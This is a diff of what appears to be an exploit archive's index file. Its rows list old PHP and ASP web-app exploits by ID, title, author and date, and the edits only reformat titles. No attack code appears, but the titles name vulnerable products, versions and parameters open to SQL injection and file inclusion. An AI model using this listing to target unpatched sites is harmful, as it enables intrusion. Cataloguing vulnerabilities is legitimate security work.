3876,platforms/php/webapps/3876.txt,"GNUEDU 1.3b2 - Multiple Remote File Inclusions",2007-05-08,GoLd_M,php,webapps,0 3878,platforms/php/webapps/3878.txt,"Miplex2 - 'SmartyFU.class.php' Remote File Inclusion",2007-05-08,"ThE TiGeR",php,webapps,0 3879,platforms/php/webapps/3879.htm,"phpMyPortal 3.0.0 RC3 - GLOBALS[CHEMINMODULES] Remote File Inclusion",2007-05-09,GoLd_M,php,webapps,0 -3884,platforms/php/webapps/3884.txt,"aForum 1.32 - (CommonAbsDir) Remote File Inclusion",2007-05-09,"ThE TiGeR",php,webapps,0 -3885,platforms/php/webapps/3885.txt,"telltarget 1.3.3 - (tt_docroot) Remote File Inclusion",2007-05-09,GoLd_M,php,webapps,0 -3886,platforms/php/webapps/3886.pl,"SimpleNews 1.0.0 FINAL - 'print.php news_id' SQL Injection",2007-05-09,Silentz,php,webapps,0 -3887,platforms/php/webapps/3887.pl,"TutorialCMS 1.00 - 'search.php search' SQL Injection",2007-05-09,Silentz,php,webapps,0 -3894,platforms/php/webapps/3894.txt,"Original 0.11 - 'config.inc.php x[1]' Remote File Inclusion",2007-05-10,GoLd_M,php,webapps,0 +3884,platforms/php/webapps/3884.txt,"aForum 1.32 - 'CommonAbsDir' Remote File Inclusion",2007-05-09,"ThE TiGeR",php,webapps,0 +3885,platforms/php/webapps/3885.txt,"telltarget 1.3.3 - 'tt_docroot' Remote File Inclusion",2007-05-09,GoLd_M,php,webapps,0 +3886,platforms/php/webapps/3886.pl,"SimpleNews 1.0.0 FINAL - 'print.php?news_id' SQL Injection",2007-05-09,Silentz,php,webapps,0 +3887,platforms/php/webapps/3887.pl,"TutorialCMS 1.00 - 'search.php?search' SQL Injection",2007-05-09,Silentz,php,webapps,0 +3894,platforms/php/webapps/3894.txt,"Original 0.11 - 'config.inc.php?x[1]' Remote File Inclusion",2007-05-10,GoLd_M,php,webapps,0 3895,platforms/php/webapps/3895.txt,"Thyme Calendar 1.3 - SQL Injection",2007-05-10,warlord,php,webapps,0 3896,platforms/php/webapps/3896.pl,"TaskDriver 1.2 - Login Bypass / SQL Injection",2007-05-10,Silentz,php,webapps,0 3900,platforms/php/webapps/3900.php,"Snaps! Gallery 1.4.4 - Remote User Pass Change Exploit",2007-05-11,Dj7xpl,php,webapps,0 -3901,platforms/php/webapps/3901.txt,"maGAZIn 2.0 - 'PHPThumb.php src' Remote File Disclosure",2007-05-11,Dj7xpl,php,webapps,0 -3902,platforms/php/webapps/3902.txt,"R2K Gallery 1.7 - 'galeria.php lang2' Local File Inclusion",2007-05-11,Dj7xpl,php,webapps,0 +3901,platforms/php/webapps/3901.txt,"maGAZIn 2.0 - 'PHPThumb.php?src' Remote File Disclosure",2007-05-11,Dj7xpl,php,webapps,0 +3902,platforms/php/webapps/3902.txt,"R2K Gallery 1.7 - 'galeria.php?lang2' Local File Inclusion",2007-05-11,Dj7xpl,php,webapps,0 3903,platforms/php/webapps/3903.php,"Monalbum 0.8.7 - Remote Code Execution",2007-05-11,Dj7xpl,php,webapps,0 3905,platforms/asp/webapps/3905.txt,"W1L3D4 philboard 0.2 - 'W1L3D4_bolum.asp' SQL Injection",2007-05-11,gsy,asp,webapps,0 -3906,platforms/php/webapps/3906.htm,"PHP FirstPost 0.1 - 'block.php Include' Remote File Inclusion",2007-05-12,Dj7xpl,php,webapps,0 +3906,platforms/php/webapps/3906.htm,"PHP FirstPost 0.1 - 'block.php?Include' Remote File Inclusion",2007-05-12,Dj7xpl,php,webapps,0 3907,platforms/php/webapps/3907.txt,"iG Shop 1.4 - 'page.php' SQL Injection",2007-05-12,gsy,php,webapps,0 3908,platforms/php/webapps/3908.txt,"YAAP 1.5 - '__autoload()' Remote File Inclusion",2007-05-12,3l3ctric-Cracker,php,webapps,0 3909,platforms/php/webapps/3909.txt,"Beacon 0.2.0 - 'splash.lang.php' Remote File Inclusion",2007-05-12,"ThE TiGeR",php,webapps,0 3911,platforms/php/webapps/3911.txt,"EfesTECH Haber 5.0 - 'id' SQL Injection",2007-05-14,CyberGhost,php,webapps,0 3914,platforms/asp/webapps/3914.txt,"BlogMe 3.0 - 'archshow.asp var' SQL Injection",2007-05-13,gsy,asp,webapps,0 -3915,platforms/php/webapps/3915.txt,"CJG EXPLORER PRO 3.2 - (g_pcltar_lib_dir) Remote File Inclusion",2007-05-13,Mogatil,php,webapps,0 -3918,platforms/php/webapps/3918.txt,"phpAtm 1.30 - (downloadfile) Remote File Disclosure",2007-05-13,Ali.Mohajem,php,webapps,0 +3915,platforms/php/webapps/3915.txt,"CJG EXPLORER PRO 3.2 - 'g_pcltar_lib_dir' Remote File Inclusion",2007-05-13,Mogatil,php,webapps,0 +3918,platforms/php/webapps/3918.txt,"phpAtm 1.30 - 'downloadfile' Remote File Disclosure",2007-05-13,Ali.Mohajem,php,webapps,0 3919,platforms/php/webapps/3919.txt,"NagiosQL 2005 2.00 - 'prepend_adm.php' Remote File Inclusion",2007-05-14,"ThE TiGeR",php,webapps,0 -3920,platforms/php/webapps/3920.txt,"Feindt Computerservice News 2.0 - 'newsadmin.php action' Remote File Inclusion",2007-05-14,Mogatil,php,webapps,0 +3920,platforms/php/webapps/3920.txt,"Feindt Computerservice News 2.0 - 'newsadmin.php?action' Remote File Inclusion",2007-05-14,Mogatil,php,webapps,0 3923,platforms/php/webapps/3923.txt,"linksnet newsfeed 1.0 - Remote File Inclusion",2007-05-14,"ThE TiGeR",php,webapps,0 3924,platforms/php/webapps/3924.txt,"Media Gallery for Geeklog 1.4.8a - Remote File Inclusion",2007-05-14,"ThE TiGeR",php,webapps,0 3928,platforms/php/webapps/3928.txt,"Achievo 1.1.0 - 'config_atkroot' Remote File Inclusion",2007-05-15,Katatafish,php,webapps,0 @@ -18431,15 +18432,15 @@ id,file,description,date,author,platform,type,port 3933,platforms/php/webapps/3933.pl,"XOOPS Module MyConference 1.0 - 'index.php' SQL Injection",2007-05-15,ajann,php,webapps,0 3935,platforms/php/webapps/3935.txt,"Glossword 1.8.1 - 'custom_vars.php' Remote File Inclusion",2007-05-16,BeyazKurt,php,webapps,0 3936,platforms/asp/webapps/3936.txt,"runawaysoft haber portal 1.0 - 'tr' Multiple Vulnerabilities",2007-05-16,kerem125,asp,webapps,0 -3941,platforms/php/webapps/3941.txt,"PHPGlossar 0.8 - (format_menue) Remote File Inclusion",2007-05-16,kezzap66345,php,webapps,0 +3941,platforms/php/webapps/3941.txt,"PHPGlossar 0.8 - 'format_menue' Remote File Inclusion",2007-05-16,kezzap66345,php,webapps,0 3942,platforms/php/webapps/3942.pl,"SimpNews 2.40.01 - 'newnr' SQL Injection",2007-05-16,Silentz,php,webapps,0 -3943,platforms/php/webapps/3943.pl,"FAQEngine 4.16.03 - 'question.php questionref' SQL Injection",2007-05-16,Silentz,php,webapps,0 +3943,platforms/php/webapps/3943.pl,"FAQEngine 4.16.03 - 'question.php?questionref' SQL Injection",2007-05-16,Silentz,php,webapps,0 3944,platforms/php/webapps/3944.txt,"Mambo Component com_yanc 1.4 Beta - 'id' SQL Injection",2007-05-17,"Mehmet Ince",php,webapps,0 3946,platforms/php/webapps/3946.txt,"GeekLog 2.x - 'ImageImageMagick.php' Remote File Inclusion",2007-05-17,diesl0w,php,webapps,0 3947,platforms/php/webapps/3947.txt,"Build it Fast (bif3) 0.4.1 - Multiple Remote File Inclusions",2007-05-17,"Alkomandoz Hacker",php,webapps,0 3948,platforms/php/webapps/3948.txt,"Libstats 1.0.3 - 'template_csv.php' Remote File Inclusion",2007-05-18,"Mehmet Ince",php,webapps,0 -3949,platforms/php/webapps/3949.txt,"MolyX BOARD 2.5.0 - 'index.php lang' Local File Inclusion",2007-05-18,MurderSkillz,php,webapps,0 -3953,platforms/php/webapps/3953.txt,"SunLight CMS 5.3 - (root) Remote File Inclusion",2007-05-19,"Mehmet Ince",php,webapps,0 +3949,platforms/php/webapps/3949.txt,"MolyX BOARD 2.5.0 - 'index.php?lang' Local File Inclusion",2007-05-18,MurderSkillz,php,webapps,0 +3953,platforms/php/webapps/3953.txt,"SunLight CMS 5.3 - 'root' Remote File Inclusion",2007-05-19,"Mehmet Ince",php,webapps,0 3955,platforms/php/webapps/3955.py,"Zomplog 3.8 - 'mp3playlist.php' SQL Injection",2007-05-20,NeoMorphS,php,webapps,0 3956,platforms/php/webapps/3956.php,"Alstrasoft e-Friends 4.21 - Admin Session Retrieve Exploit",2007-05-20,BlackHawk,php,webapps,0 3957,platforms/php/webapps/3957.php,"Alstrasoft Live Support 1.21 - Admin Credential Retrieve Exploit",2007-05-20,BlackHawk,php,webapps,0 @@ -18449,24 +18450,24 @@ id,file,description,date,author,platform,type,port 3962,platforms/php/webapps/3962.txt,"Ol BookMarks Manager 0.7.4 - 'root' Remote File Inclusion",2007-05-21,"ThE TiGeR",php,webapps,0 3963,platforms/php/webapps/3963.txt,"TutorialCMS 1.01 - Authentication Bypass",2007-05-21,Silentz,php,webapps,0 3964,platforms/php/webapps/3964.txt,"Ol BookMarks Manager 0.7.4 - SQL Injection",2007-05-21,"Mehmet Ince",php,webapps,0 -3970,platforms/php/webapps/3970.txt,"BtiTracker 1.4.1 - (become admin) SQL Injection",2007-05-22,m@ge|ozz,php,webapps,0 +3970,platforms/php/webapps/3970.txt,"BtiTracker 1.4.1 - Become Admin SQL Injection",2007-05-22,m@ge|ozz,php,webapps,0 3971,platforms/php/webapps/3971.php,"NavBoard 2.6.0 - Remote Code Execution",2007-05-23,Dj7xpl,php,webapps,0 -3972,platforms/php/webapps/3972.txt,"Scallywag - 'template.php path' Remote File Inclusion",2007-05-23,"Mehmet Ince",php,webapps,0 -3974,platforms/php/webapps/3974.pl,"Dokeos 1.8.0 - 'my_progress.php course' SQL Injection",2007-05-23,Silentz,php,webapps,0 -3980,platforms/php/webapps/3980.pl,"Dokeos 1.6.5 - 'courseLog.php scormcontopen' SQL Injection",2007-05-24,Silentz,php,webapps,0 +3972,platforms/php/webapps/3972.txt,"Scallywag - 'template.php?path' Remote File Inclusion",2007-05-23,"Mehmet Ince",php,webapps,0 +3974,platforms/php/webapps/3974.pl,"Dokeos 1.8.0 - 'my_progress.php?course' SQL Injection",2007-05-23,Silentz,php,webapps,0 +3980,platforms/php/webapps/3980.pl,"Dokeos 1.6.5 - 'courseLog.php?scormcontopen' SQL Injection",2007-05-24,Silentz,php,webapps,0 3981,platforms/php/webapps/3981.php,"CPCommerce 1.1.0 - 'id_category' SQL Injection",2007-05-24,Kacper,php,webapps,0 3983,platforms/php/webapps/3983.txt,"FirmWorX 0.1.2 - Multiple Remote File Inclusions",2007-05-24,DeltahackingTEAM,php,webapps,0 -3987,platforms/php/webapps/3987.txt,"Webavis 0.1.1 - 'class.php root' Remote File Inclusion",2007-05-25,"ThE TiGeR",php,webapps,0 +3987,platforms/php/webapps/3987.txt,"Webavis 0.1.1 - 'class.php?root' Remote File Inclusion",2007-05-25,"ThE TiGeR",php,webapps,0 3988,platforms/php/webapps/3988.php,"gCards 1.46 - SQL Injection / Remote Code Execution",2007-05-25,Silentz,php,webapps,0 -3989,platforms/php/webapps/3989.pl,"My Little Forum 1.7 - 'user.php id' SQL Injection",2007-05-25,Silentz,php,webapps,0 -3990,platforms/php/webapps/3990.txt,"vBulletin vBGSiteMap 2.41 - (root) Remote File Inclusion",2007-05-25,"Cold Zero",php,webapps,0 -3991,platforms/php/webapps/3991.txt,"OpenBASE 0.6a - (root_prefix) Remote File Inclusion",2007-05-25,DeltahackingTEAM,php,webapps,0 -3992,platforms/php/webapps/3992.txt,"FlaP 1.0b - (pachtofile) Remote File Inclusion",2007-05-25,"Mehmet Ince",php,webapps,0 +3989,platforms/php/webapps/3989.pl,"My Little Forum 1.7 - 'user.php?id' SQL Injection",2007-05-25,Silentz,php,webapps,0 +3990,platforms/php/webapps/3990.txt,"vBulletin vBGSiteMap 2.41 - 'root' Remote File Inclusion",2007-05-25,"Cold Zero",php,webapps,0 +3991,platforms/php/webapps/3991.txt,"OpenBASE 0.6a - 'root_prefix' Remote File Inclusion",2007-05-25,DeltahackingTEAM,php,webapps,0 +3992,platforms/php/webapps/3992.txt,"FlaP 1.0b - 'pachtofile' Remote File Inclusion",2007-05-25,"Mehmet Ince",php,webapps,0 3994,platforms/php/webapps/3994.txt,"Mazens PHP Chat V3 (basepath) - Remote File Inclusion",2007-05-26,"ThE TiGeR",php,webapps,0 -3995,platforms/php/webapps/3995.txt,"TROforum 0.1 - 'admin.php site_url' Remote File Inclusion",2007-05-26,"Mehmet Ince",php,webapps,0 -3997,platforms/php/webapps/3997.txt,"Frequency Clock 0.1b - (securelib) Remote File Inclusion",2007-05-27,"ThE TiGeR",php,webapps,0 +3995,platforms/php/webapps/3995.txt,"TROforum 0.1 - 'admin.php?site_url' Remote File Inclusion",2007-05-26,"Mehmet Ince",php,webapps,0 +3997,platforms/php/webapps/3997.txt,"Frequency Clock 0.1b - 'securelib' Remote File Inclusion",2007-05-27,"ThE TiGeR",php,webapps,0 3998,platforms/php/webapps/3998.php,"Fundanemt 2.2.0 - 'spellcheck.php' Remote Code Execution",2007-05-27,Kacper,php,webapps,0 -3999,platforms/php/webapps/3999.txt,"Vistered Little 1.6a - (skin) Remote File Disclosure",2007-05-28,GoLd_M,php,webapps,0 +3999,platforms/php/webapps/3999.txt,"Vistered Little 1.6a - 'skin' Remote File Disclosure",2007-05-28,GoLd_M,php,webapps,0 4000,platforms/php/webapps/4000.txt,"wanewsletter 2.1.3 - Remote File Inclusion",2007-05-28,Mogatil,php,webapps,0 4003,platforms/php/webapps/4003.sh,"Joomla! Component Phil-a-Form 1.2.0.0 - SQL Injection",2007-05-28,CypherXero,php,webapps,0 4004,platforms/php/webapps/4004.php,"Inout Search Engine - Remote Code Execution",2007-05-29,BlackHawk,php,webapps,0 @@ -18481,10 +18482,10 @@ id,file,description,date,author,platform,type,port 4029,platforms/php/webapps/4029.php,"Sendcard 3.4.1 - Local File Inclusion / Remote Code Execution",2007-06-04,Silentz,php,webapps,0 4030,platforms/php/webapps/4030.php,"EQdkp 1.3.2 - 'listmembers.php' SQL Injection",2007-06-04,Silentz,php,webapps,0 4031,platforms/php/webapps/4031.txt,"Madirish Webmail 2.0 - 'addressbook.php' Remote File Inclusion",2007-06-04,BoZKuRTSeRDaR,php,webapps,0 -4034,platforms/php/webapps/4034.txt,"Kravchuk letter script 1.0 - (scdir) Remote File Inclusion",2007-06-05,"Mehmet Ince",php,webapps,0 -4035,platforms/php/webapps/4035.txt,"Comicsense 0.2 - index.php 'epi' SQL Injection (1)",2007-06-05,s0cratex,php,webapps,0 +4034,platforms/php/webapps/4034.txt,"Kravchuk letter script 1.0 - 'scdir' Remote File Inclusion",2007-06-05,"Mehmet Ince",php,webapps,0 +4035,platforms/php/webapps/4035.txt,"Comicsense 0.2 - 'index.php?epi' SQL Injection (1)",2007-06-05,s0cratex,php,webapps,0 4036,platforms/php/webapps/4036.php,"PBLang 4.67.16.a - Remote Code Execution",2007-06-06,Silentz,php,webapps,0 -4037,platforms/php/webapps/4037.pl,"Comicsense 0.2 - index.php 'epi' SQL Injection (2)",2007-06-06,Silentz,php,webapps,0 +4037,platforms/php/webapps/4037.pl,"Comicsense 0.2 - 'index.php?epi' SQL Injection (2)",2007-06-06,Silentz,php,webapps,0 4039,platforms/php/webapps/4039.txt,"WordPress 2.2 - 'xmlrpc.php' SQL Injection",2007-06-06,Slappter,php,webapps,0 4040,platforms/asp/webapps/4040.txt,"Kartli Alisveris Sistemi 1.0 - SQL Injection",2007-06-06,kerem125,asp,webapps,0 4041,platforms/php/webapps/4041.htm,"NewsSync for phpBB 1.5.0rc6 - Remote File Inclusion",2007-06-07,GoLd_M,php,webapps,0 @@ -18492,11 +18493,11 @@ id,file,description,date,author,platform,type,port 4055,platforms/php/webapps/4055.htm,"PHP Real Estate Classifieds - Remote File Inclusion",2007-06-09,"not sec group",php,webapps,0 4057,platforms/asp/webapps/4057.txt,"GeometriX Download Portal - 'down_indir.asp id' SQL Injection",2007-06-09,CyberGhost,asp,webapps,0 4059,platforms/php/webapps/4059.txt,"Link Request Contact Form 3.4 - Remote Code Execution",2007-06-11,CorryL,php,webapps,0 -4062,platforms/php/webapps/4062.pl,"Fuzzylime Forum 1.0 - 'low.php topic' SQL Injection",2007-06-12,Silentz,php,webapps,0 +4062,platforms/php/webapps/4062.pl,"Fuzzylime Forum 1.0 - 'low.php?topic' SQL Injection",2007-06-12,Silentz,php,webapps,0 4063,platforms/php/webapps/4063.txt,"xoops module tinycontent 1.5 - Remote File Inclusion",2007-06-12,Sp[L]o1T,php,webapps,0 4064,platforms/php/webapps/4064.txt,"XOOPS Module horoscope 2.0 - Remote File Inclusion",2007-06-12,BeyazKurt,php,webapps,0 4068,platforms/php/webapps/4068.txt,"XOOPS Module XFsection - 'modify.php' Remote File Inclusion",2007-06-13,Sp[L]o1T,php,webapps,0 -4069,platforms/php/webapps/4069.txt,"XOOPS Module XT-Conteudo - (spaw_root) Remote File Inclusion",2007-06-13,g00ns,php,webapps,0 +4069,platforms/php/webapps/4069.txt,"XOOPS Module XT-Conteudo - 'spaw_root' Remote File Inclusion",2007-06-13,g00ns,php,webapps,0 4070,platforms/php/webapps/4070.txt,"XOOPS Module cjay content 3 - Remote File Inclusion",2007-06-13,g00ns,php,webapps,0 4071,platforms/php/webapps/4071.txt,"Sitellite CMS 4.2.12 - '559668.php' Remote File Inclusion",2007-06-14,o0xxdark0o,php,webapps,0 4072,platforms/php/webapps/4072.txt,"PHP::HTML 0.6.4 - 'PHPhtml.php' Remote File Inclusion",2007-06-14,o0xxdark0o,php,webapps,0 @@ -18506,7 +18507,7 @@ id,file,description,date,author,platform,type,port 4078,platforms/php/webapps/4078.php,"Solar Empire 2.9.1.1 - Blind SQL Injection / Hash Retrieve Exploit",2007-06-18,BlackHawk,php,webapps,0 4079,platforms/php/webapps/4079.txt,"MiniBill 1.2.5 - 'run_billing.php' Remote File Inclusion",2007-06-18,Abo0od,php,webapps,0 4081,platforms/php/webapps/4081.php,"Jasmine CMS 1.0 - SQL Injection / Remote Code Execution",2007-06-19,Silentz,php,webapps,0 -4082,platforms/php/webapps/4082.pl,"LiveCMS 3.4 - 'categoria.php cid' SQL Injection",2007-06-20,g00ns,php,webapps,0 +4082,platforms/php/webapps/4082.pl,"LiveCMS 3.4 - 'categoria.php?cid' SQL Injection",2007-06-20,g00ns,php,webapps,0 4083,platforms/asp/webapps/4083.txt,"W1L3D4 WEBmarket 0.1 - SQL Injection",2007-06-20,Crackers_Child,asp,webapps,0 4084,platforms/php/webapps/4084.txt,"XOOPS Module wiwimod 0.4 - Remote File Inclusion",2007-06-20,GoLd_M,php,webapps,0 4085,platforms/php/webapps/4085.txt,"Musoo 0.21 - Remote File Inclusion",2007-06-20,GoLd_M,php,webapps,0 @@ -18515,19 +18516,19 @@ id,file,description,date,author,platform,type,port 4090,platforms/php/webapps/4090.pl,"Powl 0.94 - 'htmledit.php' Remote File Inclusion",2007-06-22,Kw3[R]Ln,php,webapps,0 4091,platforms/php/webapps/4091.txt,"Sun Board 1.00.00 alpha - Remote File Inclusion",2007-06-22,GoLd_M,php,webapps,0 4092,platforms/php/webapps/4092.txt,"NetClassifieds - SQL Injection / Cross-Site Scripting / Full Path",2007-06-22,"laurent gaffié",php,webapps,0 -4095,platforms/php/webapps/4095.txt,"Pharmacy System 2.0 - 'index.php ID' SQL Injection",2007-06-24,t0pP8uZz,php,webapps,0 +4095,platforms/php/webapps/4095.txt,"Pharmacy System 2.0 - 'index.php?ID' SQL Injection",2007-06-24,t0pP8uZz,php,webapps,0 4096,platforms/php/webapps/4096.php,"Pluxml 0.3.1 - Remote Code Execution",2007-06-24,DarkFig,php,webapps,0 4097,platforms/php/webapps/4097.txt,"dagger Web engine 23jan2007 - Remote File Inclusion",2007-06-24,Katatafish,php,webapps,0 -4098,platforms/php/webapps/4098.php,"Simple Invoices 2007 05 25 - 'index.php submit' SQL Injection",2007-06-24,Kacper,php,webapps,0 -4099,platforms/php/webapps/4099.txt,"e107 < 0.7.8 - (photograph) Arbitrary File Upload",2007-06-24,g00ns,php,webapps,0 -4100,platforms/php/webapps/4100.txt,"phpTrafficA 1.4.2 - (pageid) SQL Injection",2007-06-24,"laurent gaffié",php,webapps,0 -4102,platforms/php/webapps/4102.txt,"b1gbb 2.24.0 - 'footer.inc.php tfooter' Remote File Inclusion",2007-06-25,Rf7awy,php,webapps,0 +4098,platforms/php/webapps/4098.php,"Simple Invoices 2007 05 25 - 'index.php?submit' SQL Injection",2007-06-24,Kacper,php,webapps,0 +4099,platforms/php/webapps/4099.txt,"e107 < 0.7.8 - 'photograph' Arbitrary File Upload",2007-06-24,g00ns,php,webapps,0 +4100,platforms/php/webapps/4100.txt,"phpTrafficA 1.4.2 - 'pageid' SQL Injection",2007-06-24,"laurent gaffié",php,webapps,0 +4102,platforms/php/webapps/4102.txt,"b1gbb 2.24.0 - 'footer.inc.php?tfooter' Remote File Inclusion",2007-06-25,Rf7awy,php,webapps,0 4103,platforms/php/webapps/4103.txt,"bugmall shopping cart 2.5 - SQL Injection / Cross-Site Scripting",2007-06-25,t0pP8uZz,php,webapps,0 4104,platforms/php/webapps/4104.txt,"6ALBlog - 'newsid' SQL Injection",2007-06-25,Crackers_Child,php,webapps,0 -4105,platforms/php/webapps/4105.txt,"SiteDepth CMS 3.44 - 'ShowImage.php name' File Disclosure",2007-06-25,"H4 / XPK",php,webapps,0 +4105,platforms/php/webapps/4105.txt,"SiteDepth CMS 3.44 - 'ShowImage.php?name' File Disclosure",2007-06-25,"H4 / XPK",php,webapps,0 4106,platforms/php/webapps/4106.php,"DreamLog 0.5 - 'upload.php' Arbitrary File Upload",2007-06-25,Dj7xpl,php,webapps,0 4107,platforms/php/webapps/4107.txt,"Pagetool 1.07 - 'news_id' SQL Injection",2007-06-25,Katatafish,php,webapps,0 -4108,platforms/php/webapps/4108.txt,"eDocStore - 'doc.php doc_id' SQL Injection",2007-06-25,t0pP8uZz,php,webapps,0 +4108,platforms/php/webapps/4108.txt,"eDocStore - 'doc.php?doc_id' SQL Injection",2007-06-25,t0pP8uZz,php,webapps,0 4111,platforms/php/webapps/4111.txt,"PHPSiteBackup 0.1 - 'pcltar.lib.php' Remote File Inclusion",2007-06-26,GoLd_M,php,webapps,0 4112,platforms/php/webapps/4112.txt,"EVA-Web 1.1 < 2.2 - 'index.php3' Remote File Inclusion",2007-06-26,g00ns,php,webapps,0 4113,platforms/php/webapps/4113.pl,"WordPress 2.2 - 'wp-app.php' Arbitrary File Upload",2007-06-26,"Alexander Concha",php,webapps,0 @@ -18536,8 +18537,8 @@ id,file,description,date,author,platform,type,port 4116,platforms/php/webapps/4116.txt,"QuickTicket 1.2 - 'qti_checkname.php' Local File Inclusion",2007-06-27,Katatafish,php,webapps,0 4122,platforms/php/webapps/4122.txt,"b1gbb 2.24.0 - SQL Injection / Cross-Site Scripting",2007-06-28,GoLd_M,php,webapps,0 4124,platforms/php/webapps/4124.txt,"GL-SH Deaf Forum 6.4.4 - Local File Inclusion",2007-06-28,Katatafish,php,webapps,0 -4125,platforms/php/webapps/4125.txt,"WebChat 0.78 - 'login.php rid' SQL Injection",2007-06-28,r00t,php,webapps,0 -4127,platforms/php/webapps/4127.txt,"Buddy Zone 1.5 - 'view_sub_cat.php cat_id' SQL Injection",2007-06-29,t0pP8uZz,php,webapps,0 +4125,platforms/php/webapps/4125.txt,"WebChat 0.78 - 'login.php?rid' SQL Injection",2007-06-28,r00t,php,webapps,0 +4127,platforms/php/webapps/4127.txt,"Buddy Zone 1.5 - 'view_sub_cat.php?cat_id' SQL Injection",2007-06-29,t0pP8uZz,php,webapps,0 4128,platforms/php/webapps/4128.txt,"Buddy Zone 1.5 - Multiple SQL Injections",2007-06-30,t0pP8uZz,php,webapps,0 4129,platforms/php/webapps/4129.txt,"Ripe Website Manager (CMS) 0.8.9 - Remote File Inclusion",2007-06-30,BlackNDoor,php,webapps,0 4130,platforms/php/webapps/4130.txt,"TotalCalendar 2.402 - 'view_event.php' SQL Injection",2007-06-30,t0pP8uZz,php,webapps,0 @@ -18546,10 +18547,10 @@ id,file,description,date,author,platform,type,port 4133,platforms/php/webapps/4133.txt,"ArcadeBuilder Game Portal Manager 1.7 - SQL Injection",2007-07-01,t0pP8uZz,php,webapps,0 4134,platforms/php/webapps/4134.txt,"Easybe 1-2-3 Music Store - 'process.php' SQL Injection",2007-07-01,t0pP8uZz,php,webapps,0 4135,platforms/php/webapps/4135.pl,"phpEventCalendar 0.2.3 - 'eventdisplay.php' SQL Injection",2007-07-01,Iron,php,webapps,0 -4136,platforms/php/webapps/4136.txt,"YouTube Clone Script - 'msg.php id' SQL Injection",2007-07-02,t0pP8uZz,php,webapps,0 -4138,platforms/php/webapps/4138.txt,"AV Arcade 2.1b - 'index.php id' SQL Injection",2007-07-02,Kw3[R]Ln,php,webapps,0 -4139,platforms/php/webapps/4139.txt,"PHPDirector 0.21 - 'videos.php id' SQL Injection",2007-07-02,Kw3[R]Ln,php,webapps,0 -4140,platforms/php/webapps/4140.txt,"vbzoom 1.x - 'forum.php MainID' SQL Injection",2007-07-02,"Cold Zero",php,webapps,0 +4136,platforms/php/webapps/4136.txt,"YouTube Clone Script - 'msg.php?id' SQL Injection",2007-07-02,t0pP8uZz,php,webapps,0 +4138,platforms/php/webapps/4138.txt,"AV Arcade 2.1b - 'index.php?id' SQL Injection",2007-07-02,Kw3[R]Ln,php,webapps,0 +4139,platforms/php/webapps/4139.txt,"PHPDirector 0.21 - 'videos.php?id' SQL Injection",2007-07-02,Kw3[R]Ln,php,webapps,0 +4140,platforms/php/webapps/4140.txt,"vbzoom 1.x - 'forum.php?MainID' SQL Injection",2007-07-02,"Cold Zero",php,webapps,0 4141,platforms/php/webapps/4141.txt,"SuperCali PHP Event Calendar 0.4.0 - SQL Injection",2007-07-03,t0pP8uZz,php,webapps,0 4142,platforms/php/webapps/4142.txt,"Girlserv ads 1.5 - 'details_news.php' SQL Injection",2007-07-03,"Cold Zero",php,webapps,0 4144,platforms/php/webapps/4144.php,"MyCMS 0.9.8 - Remote Command Execution (2)",2007-07-03,BlackHawk,php,webapps,0 @@ -18560,40 +18561,40 @@ id,file,description,date,author,platform,type,port 4153,platforms/php/webapps/4153.txt,"PHPVID 0.9.9 - 'categories_type.php' SQL Injection",2007-07-06,t0pP8uZz,php,webapps,0 4154,platforms/php/webapps/4154.txt,"eMeeting Online Dating Software 5.2 - SQL Injection",2007-07-06,t0pP8uZz,php,webapps,0 4156,platforms/php/webapps/4156.txt,"LimeSurvey (phpsurveyor) 1.49rc2 - Remote File Inclusion",2007-07-06,"Yakir Wizman",php,webapps,0 -4159,platforms/php/webapps/4159.txt,"GameSiteScript 3.1 - (profile id) SQL Injection",2007-07-07,Xenduer77,php,webapps,0 -4161,platforms/php/webapps/4161.txt,"FlashGameScript 1.7 - (user) SQL Injection",2007-07-08,Xenduer77,php,webapps,0 +4159,platforms/php/webapps/4159.txt,"GameSiteScript 3.1 - profile id SQL Injection",2007-07-07,Xenduer77,php,webapps,0 +4161,platforms/php/webapps/4161.txt,"FlashGameScript 1.7 - 'user' SQL Injection",2007-07-08,Xenduer77,php,webapps,0 4163,platforms/php/webapps/4163.php,"AV Tutorial Script 1.0 - Remote User Pass Change Exploit",2007-07-08,Dj7xpl,php,webapps,0 -4164,platforms/php/webapps/4164.txt,"Aigaion 1.3.3 - (topic topic_id) SQL Injection",2007-07-09,CypherXero,php,webapps,0 +4164,platforms/php/webapps/4164.txt,"Aigaion 1.3.3 - 'topic topic_id' SQL Injection",2007-07-09,CypherXero,php,webapps,0 4166,platforms/php/webapps/4166.txt,"vBulletin Mod RPG Inferno 2.4 - 'inferno.php' SQL Injection",2007-07-10,t0pP8uZz,php,webapps,0 -4167,platforms/php/webapps/4167.txt,"OpenLD 1.2.2 - 'index.php id' SQL Injection",2007-07-10,CypherXero,php,webapps,0 +4167,platforms/php/webapps/4167.txt,"OpenLD 1.2.2 - 'index.php?id' SQL Injection",2007-07-10,CypherXero,php,webapps,0 4169,platforms/php/webapps/4169.txt,"FlashBB 1.1.8 - 'sendmsg.php' Remote File Inclusion",2007-07-10,Kw3[R]Ln,php,webapps,0 4171,platforms/php/webapps/4171.pl,"Mail Machine 3.989 - Local File Inclusion",2007-07-10,"H4 / XPK",php,webapps,0 4173,platforms/php/webapps/4173.txt,"SquirrelMail G/PGP Encryption Plugin 2.0 - Command Execution",2007-07-11,jmp-esp,php,webapps,0 -4174,platforms/php/webapps/4174.txt,"PsNews 1.1 - 'show.php newspath' Local File Inclusion",2007-07-12,irk4z,php,webapps,0 +4174,platforms/php/webapps/4174.txt,"PsNews 1.1 - 'show.php?newspath' Local File Inclusion",2007-07-12,irk4z,php,webapps,0 4179,platforms/php/webapps/4179.php,"MKPortal 1.1.1 reviews / Gallery modules - SQL Injection",2007-07-12,Coloss,php,webapps,0 4180,platforms/php/webapps/4180.txt,"MKPortal NoBoard Module (Beta) - Remote File Inclusion",2007-07-14,g00ns,php,webapps,0 4182,platforms/php/webapps/4182.txt,"CMScout 1.23 - 'index.php' SQL Injection",2007-07-14,g00ns,php,webapps,0 4183,platforms/php/webapps/4183.txt,"eSyndiCat Directory Software - Multiple SQL Injections",2007-07-14,d3v1l,php,webapps,0 -4184,platforms/php/webapps/4184.txt,"Realtor 747 - 'index.php categoryId' SQL Injection",2007-07-14,t0pP8uZz,php,webapps,0 -4185,platforms/php/webapps/4185.txt,"Prozilla Directory Script - 'Directory.php cat_id' SQL Injection",2007-07-14,t0pP8uZz,php,webapps,0 +4184,platforms/php/webapps/4184.txt,"Realtor 747 - 'index.php?categoryId' SQL Injection",2007-07-14,t0pP8uZz,php,webapps,0 